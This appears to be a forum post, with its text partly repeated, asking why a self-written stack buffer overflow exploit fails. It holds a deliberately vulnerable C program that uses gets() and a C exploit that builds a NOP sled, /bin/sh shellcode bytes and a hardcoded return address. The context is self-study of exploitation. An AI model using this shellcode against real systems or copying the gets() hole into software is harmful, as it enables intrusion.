I have written a program "master.c" that is using gets and is vulnerable to buffer overflow:
I have written another program "shellcode.c" that overflows the buffer in master.c and tried to spawn a shell at the terminal:
To achieve this, I have already written the assembly program to spawn the shell and obtained the OP codes against the assembly code. Then I have written a C program to create a char buffer containing those OP codes and tried to overflow the buffer of the master program.... so that the return address of the main is overwritten with the address of the char buffer containing the code for spawning the shell.
When it comes to passing the input string (i.e. the buffer containing the shell spawning code) to the master program, I have simply used the piped out of my program to the master program (i.e. standard output and standard input).
i.e. TY@Bash$ ./shellcode | ./master
Unfortunately, this trick doesn't work for me, even with a lot of variations in address and the code.
I need to know all the possible ways to pass the data (containing the OP codes) to the master program ... when required by GETS().
** As a verification, I have already checked the code overflow the buffer of my own program i.e. shellcode.c and found that it spawns the shell successfully. I have even tried adding an instruction for "INT3" it works fine. This leads me conclude the following:
- Either I am not passing the string to the master program in the correct way.
- Or I am unable to locate the correct address of the variable 'buf' in master.c to return to.
Code:
//----- master.c -- MASTER PROGRAM ------------------------------
#include <stdio.h>
int main(int argc, char** argv)
{
char buf[100];
printf("Please enter your name: ");
fflush(stdout);
gets(buf);
printf("Hello \"%s\"\n", buf);
}
void notcalled(void)
{
printf("This is a secret string");
}
I have written another program "shellcode.c" that overflows the buffer in master.c and tried to spawn a shell at the terminal:
Code:
//---- shellcode.c --- MY PROGRAM ----------------------------
#include <stdio.h>
char shellops[] = "\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56\xb0\x3b\x50\xcd\x80\xe8\xed\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
#define NOP 0x90
#define BUFLEN 108
#define RETADDR 0xbfbffa4c
int main(void)
{
char buf[BUFLEN];
int i;
for (i=0; i<BUFLEN; i+=4)
*(long *)&buf[i] = RETADDR;
for (i=0; i<50; i++)
*(buf+i) = NOP;
memcpy(buf+i, shellops, strlen(shellops));
printf("%s", buf);
return 0;
}
To achieve this, I have already written the assembly program to spawn the shell and obtained the OP codes against the assembly code. Then I have written a C program to create a char buffer containing those OP codes and tried to overflow the buffer of the master program.... so that the return address of the main is overwritten with the address of the char buffer containing the code for spawning the shell.
When it comes to passing the input string (i.e. the buffer containing the shell spawning code) to the master program, I have simply used the piped out of my program to the master program (i.e. standard output and standard input).
i.e. TY@Bash$ ./shellcode | ./master
Unfortunately, this trick doesn't work for me, even with a lot of variations in address and the code.
I need to know all the possible ways to pass the data (containing the OP codes) to the master program ... when required by GETS().
** As a verification, I have already checked the code overflow the buffer of my own program i.e. shellcode.c and found that it spawns the shell successfully. I have even tried adding an instruction for "INT3" it works fine. This leads me conclude the following:
- Either I am not passing the string to the master program in the correct way.
- Or I am unable to locate the correct address of the variable 'buf' in master.c to return to.